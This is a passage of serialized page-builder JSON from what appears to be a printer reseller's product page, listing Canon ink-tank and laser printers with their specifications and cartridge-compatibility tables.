(borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"13\\\" align=\\\"center\\\">imagePROGRAF PRO-500<\\/td>\\n<td>Maintenance Cartridge MC-20<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Blue)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Chroma Optimizer)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Matte Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Red)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY iB4170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5070<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5370<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5470<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E3170<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E4270<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E470<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E477<\\/td>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E480<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E510<\\/td>\\n<td>CL-98 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-88 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560 \\/ E560R<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G2010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G4010<\\/td>\\n<td>GI-790 